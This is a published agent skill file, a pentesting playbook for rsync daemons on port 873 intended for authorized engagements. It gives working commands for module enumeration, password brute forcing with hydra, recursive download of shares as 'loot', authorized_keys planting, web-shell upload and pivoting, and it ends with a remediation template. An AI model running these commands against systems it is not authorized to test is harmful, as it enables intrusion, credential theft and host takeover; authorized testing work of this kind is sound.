pentesting-rsync

star 618

Testing rsync daemon services (default port 873) for unauthenticated module listing and access, weak/default credentials and brute force, arbitrary file read/download and write/upload (including authorized_keys planting), and rsyncd.conf/secrets misconfiguration during authorized engagements.

xalgord By xalgord schedule Updated 6/6/2026
play_arrow Run Skill in Manus View GitHub

name: pentesting-rsync description: Testing rsync daemon services (default port 873) for unauthenticated module listing and access, weak/default credentials and brute force, arbitrary file read/download and write/upload (including authorized_keys planting), and rsyncd.conf/secrets misconfiguration during authorized engagements. domain: cybersecurity subdomain: network-services-pentesting tags:

  • penetration-testing
  • network-services
  • rsync version: '1.0' author: xalgorix license: Apache-2.0

Pentesting rsync (port 873)

When to Use

  • Default port 873/tcp for the rsync daemon protocol (rsync://); alternate ports such as 8730 are common on NAS devices.
  • When nmap/banner shows rsync or a connection returns an @RSYNCD: <version> banner.
  • For enumerating exposed "modules" (directory shares), assessing auth requirements, and testing read/write access.

Quick Enumeration

# Banner grab + manual module listing
nc -vn <IP> 873
# Server greets:  @RSYNCD: 31.0   -> echo same line back, then send:  #list
# Server enumerates modules, e.g.:  raidroot  USBCopy  NAS_Public  ... then @RSYNCD: EXIT

# nmap module listing
nmap -sV --script "rsync-list-modules" -p 873 <IP>

# Metasploit module listing
msfconsole -q -x 'use auxiliary/scanner/rsync/modules_list; set RHOSTS <IP>; run; exit'

# Native client listing (also IPv6 / alternate port)
rsync -av --list-only rsync://<IP>
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730

Critical: Checks Most Often Missed

  • Unauthenticated module access — many modules require no password and allow full read (and sometimes write). The #1 miss.
    • How to CONFIRM:
      rsync -av --list-only rsync://<IP>/<module>     # lists without prompting = no auth
rsync -av rsync://<IP>/<module> ./loot          # downloads recursively
  • Auth-required modules revealed by the protocol — a module that responds @RSYNCD: AUTHREQD <challenge> confirms a password gate worth brute forcing.
    • How to CONFIRM: manual nc listing shows @RSYNCD: AUTHREQD ... for that module name.
  • Writable modules → key planting / file overwrite — write access lets you drop authorized_keys, cron jobs, or web shells.
    • How to CONFIRM:
      rsync -av ~/.ssh/ rsync://<IP>/<module>/<user>/.ssh    # upload authorized_keys
  • Hidden modules — some shares are not listed; test guessed names (home, backup, www, etc, share).
  • rsyncd.conf / secrets file (post-access) — secrets file points to a user:password file usable for further auth.
    • How to CONFIRM: find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \).

Workflow

Step 1: Enumerate (modules, auth requirement, version)

nc -vn <IP> 873                 # @RSYNCD banner; send back version line then #list
nmap -sV --script rsync-list-modules -p 873 <IP>
rsync -av --list-only rsync://<IP>          # list modules
rsync -av --list-only rsync://<IP>/<module> # probe a module for auth prompt

Step 2: Authenticate (anonymous, default, brute force)

# Anonymous (no creds) listing/copy
rsync -av --list-only rsync://<IP>/<module>

# With credentials (password prompt appears)
rsync -av --list-only rsync://<user>@<IP>/<module>

# Brute force a protected module
hydra -l <user> -P passwords.txt rsync://<IP>
nxc rsync <IP> -u users.txt -p passwords.txt 2>/dev/null   # if supported by your build

Step 3: Exploit / Extract (download, upload, key planting)

# Recursively download a share (preserves attributes/permissions)
rsync -av rsync://<IP>:873/<module> ./rsync_shared
rsync -av rsync://<user>@<IP>:8730/<module> ./rsync_shared

# Upload content (e.g., authorized_keys for SSH access)
rsync -av ~/.ssh/ rsync://<user>@<IP>/<home_module>/.ssh

# Drop a web shell into a writable web module
rsync -av ./shell.php rsync://<IP>/<www_module>/

Step 4: Post-access / pivot

  • If you planted authorized_keys, connect: ssh -i ~/.ssh/id_rsa <user>@<IP>.
  • Locate config/secrets for additional creds: find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \).
  • Mine downloaded backups for credentials, source code, and configuration to pivot to other services.

Key Concepts

Concept Description
rsync daemon Native rsync:// protocol on 873 exposing named "modules".
Module A directory share, optionally password-protected, defined in rsyncd.conf.
@RSYNCD handshake Server sends @RSYNCD: <ver>; client echoes it, then #list or a module name.
AUTHREQD @RSYNCD: AUTHREQD <challenge> indicates the module needs a password.
Writable module Write access enables file overwrite, key planting, and web-shell upload.
secrets file rsyncd.conf secrets file directive points to a user:pass credential file.

Tools & Systems

Tool Purpose
rsync (client) Module listing, recursive download, and upload over rsync://.
nc Manual @RSYNCD handshake, module enumeration, auth-requirement detection.
nmap NSE rsync-list-modules.
Metasploit auxiliary/scanner/rsync/modules_list.
hydra Brute force of password-protected modules.
find Post-access discovery of rsyncd.conf / rsyncd.secrets.

Common Scenarios

Scenario 1: Anonymous backup module → data exfiltration

rsync -av --list-only rsync://<IP>/backup lists files without a prompt. rsync -av rsync://<IP>/backup ./loot downloads full system backups containing /etc/shadow and SSH keys.

Scenario 2: Writable home module → SSH access

A home_user module is writable. Uploading authorized_keys via rsync -av ~/.ssh/ rsync://user@<IP>/home_user/.ssh then ssh user@<IP> yields an interactive shell.

Scenario 3: NAS on alternate port

A NAS exposes rsync on 8730. rsync -av --list-only rsync://<IP>:8730 reveals NAS_Public with read access to shared documents and stored credentials.

Output Format

## rsync Finding

**Service**: rsync daemon
**Port**: 873/tcp (protocol 31.0)
**Severity**: High
**Finding**: Unauthenticated, writable module exposing the filesystem
**Evidence**:
  - rsync-list-modules: "backup", "home_user", "www"
  - rsync -av --list-only rsync://<IP>/backup listed files with no auth
  - uploaded authorized_keys to rsync://<IP>/home_user/.ssh and obtained SSH access
**Impact**: Unauthenticated attackers can read sensitive backups and write SSH keys/web shells, leading to full host compromise.
**Recommendation**:
  1. Require authentication on every module (`auth users` + `secrets file`).
  2. Set `read only = yes` unless write is strictly needed; scope `path` tightly.
  3. Bind rsyncd to management networks / restrict by `hosts allow`, or tunnel rsync over SSH instead.
Install via CLI
npx skills add https://github.com/xalgord/xalgorix --skill pentesting-rsync
Repository Details
star Stars 618
call_split Forks 109
navigation Branch main
article Path SKILL.md
More from Creator
xalgord
xalgord Explore all skills →